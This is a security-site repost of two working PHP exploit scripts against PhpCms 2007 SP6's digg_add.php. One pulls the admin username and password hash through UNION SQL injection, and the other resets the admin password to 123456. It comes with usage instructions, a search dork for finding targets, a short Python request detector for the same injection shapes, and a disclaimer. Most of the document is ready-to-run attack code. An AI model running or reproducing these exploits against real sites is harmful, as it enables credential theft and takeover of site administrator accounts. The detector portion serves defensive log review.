PhpCms2007 sp6 SQL injection 0day 's

admin, 2017-04-25 23:43:23

<?
print_r('
--------------------------------------------------------------------------------
 PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit
 BY T00ls(www.T00ls.net)
--------------------------------------------------------------------------------
');

if ($argc<3) {
    print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host:  target server (ip/hostname), without "http://"
path:  path to phpcms
Example: php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
    die;
}

function getrand($i) {
    $randnum = '';
    for ($j=0; $j<=$i-1; $j++) {
        srand((double)microtime()*1000000);
        $randname = rand(!$j ? 1 : 0, 9);
        $randnum .= $randname;
    }
    return $randnum;
}

function sendpacketii($packet) {
    global $host, $html;
    $ock = fsockopen(gethostbyname($host), '80');
    if (!$ock) { echo 'No response from '.$host; die; }
    fputs($ock, $packet);
    $html = '';
    while (!feof($ock)) { $html .= fgets($ock); }
    fclose($ock);
}

$host   = $argv[1];
$path   = $argv[2];
$prefix = "phpcms_";
$cookie = "PHPSESSID=2456c055c52722efa1268504d07945f2";

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) { echo 'Error... check the path!'; die; }

/* get $prefix */
$packet  = "GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=1/**/union/**/select HTTP/1.0\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Cookie: ".$cookie."\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("in your SQL syntax", $html)) {
    $temp = explode("From ", $html);
    if (isset($temp[1])) { $temp2 = explode("product", $temp[1]); }
    if ($temp2[0]) $prefix = $temp2[0];
    echo "[+]prefix -> ".$prefix."\n";
}
echo "[~]exploiting now, plz wait\r\n";

$packet  = "GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=".getrand(6)."/**/union/**/all/**/select%201,2,3,concat(username,0x7C0D0A,password)%20from%20".$prefix."member%20where%20userid=1# HTTP/1.0\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Cookie: ".$cookie."\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi(chr(181).chr(227).chr(187).chr(247), $html)) {
    echo $packet;
    echo $html;
    die("Exploit failed...");
} else {
    $pattern = "/<a href=\"\/(.*?)\">/si";
    preg_match($pattern, $html, $pg);
    $result = explode("|", $pg[1]);
    print_r('
--------------------------------------------------------------------------------
[+]username -> '.$result[0].'
[+]password(md5 32位) -> '.$result[1].'
--------------------------------------------------------------------------------
');
}

function is_hash($hash) {
    if (ereg("^[a-f0-9]{32}", trim($hash))) { return true; } else { return false; }
}

if (is_hash($result[1])) { echo "Exploit succeeded..."; } else { echo "Exploit failed..."; }
?>

Let me also add the exploit Ryat posted, which can update the administrator password:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
 Phpcms 2007 SP6 reset admin password exploit
 by puret_t
 mail: puretot at gmail dot com
 team: http://www.wolvez.org
 dork: "Powered by Phpcms 2007"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 4) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user
host:      target server (ip/hostname)
path:      path to phpcms
user:      admin login name
Example: php '.$argv[0].' localhost /phpcms/ admin
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];

$url = 'http://'.$host.$path.'member/member.php?username='.$user;

send();

if (strpos(file_get_contents($url), 'puret_t') !== false)
    exit("Exploit Success!\nAdmin New Password:\t123456\n");
else
    exit("Exploit Failed!\n");

function send() {
    global $host, $path, $user;

    $cmd = 'digg_mod=admin,(SELECT/**/1/**/AS/**/credit_on,0x'
         . bin2hex('1\',password=\'e10adc3949ba59abbe56e057f20f883e\',email=\'puret_t\',showemail=1 WHERE username=\''.$user.'\'#')
         . '/**/AS/**/credit,0x'.bin2hex('\' UNION SELECT 1#')
         . '/**/AS/**/editor)/**/AS/**/ryat/**/LIMIT/**/1%23&id=1&con=6';

    $message  = "POST ".$path."digg/digg_add.php HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "CLIENT-IP: ".time()."\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';
    while ($fp && !feof($fp)) $resp .= fread($fp, 1024);

    return $resp;
}
?>
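Both scripts above abuse the same two parameters of digg/digg_add.php: `id` (which should only ever be an integer) and `digg_mod` (which should only ever be a bare identifier). As an added example, not part of the original post or of either exploit, the Python check below flags requests of those shapes for log review or WAF rules, after undoing URL encoding, `/**/` comment padding and MySQL `0x..` hex literals that hide the injected string; the sample requests are constructed, not captured traffic.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Undo (repeated) URL encoding, expand 0x.. hex literals so strings hidden in
# them become visible, and collapse /**/ comment padding to plain spaces.
def normalize(value: str) -> str:
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    value = re.sub(r"0x((?:[0-9a-fA-F]{2})+)",
                   lambda m: bytes.fromhex(m.group(1)).decode("latin-1"), value)
    return re.sub(r"/\*.*?\*/", " ", value, flags=re.S).lower()

SQLI = re.compile(r"\bunion\b.*?\bselect\b|\bconcat\s*\(|\bpassword\s*=|#", re.S)

def check_digg_request(method: str, target: str, body: str = "") -> list:
    """Reasons a digg/digg_add.php request matches the injection shapes above."""
    path, _, query = target.partition("?")
    if not path.endswith("digg/digg_add.php"):
        return []
    params = parse_qs(query, keep_blank_values=True)
    if method.upper() == "POST":                 # the second exploit posts its payload
        for key, vals in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(vals)
    reasons = []
    for v in params.get("id", []):               # id must be a plain integer
        if not v.isdigit():
            reasons.append("non-numeric id: %r" % v[:30])
    for v in params.get("digg_mod", []):         # digg_mod must be an identifier
        if not re.fullmatch(r"\w+", v):
            reasons.append("digg_mod is not an identifier: %r" % v[:30])
    for key, vals in params.items():             # generic SQL syntax after normalising
        if any(SQLI.search(normalize(v)) for v in vals):
            reasons.append("SQL syntax in parameter %s" % key)
    return reasons

# Constructed samples mirroring the two request shapes above (not captured traffic).
SAMPLES = [
    ("GET", "/digg/digg_add.php?con=2&digg_mod=product&id=1/**/union/**/select", ""),
    ("POST", "/phpcms/digg/digg_add.php",
     "digg_mod=admin,(SELECT/**/1/**/AS/**/credit_on,0x"
     + "1',password='x' WHERE username='admin'#".encode().hex()
     + "/**/AS/**/credit)/**/AS/**/ryat/**/LIMIT/**/1%23&id=1&con=6"),
    ("GET", "/digg/digg_add.php?con=2&digg_mod=product&id=42", ""),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[0], sample[1][:40], check_digg_request(*sample))
```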

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site assumes no legal or joint liability. For any problems, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the mail is not filtered; contact details are on the home page).
Source: CN-SEC中文网, https://cn-sec.com/archives/45591.html
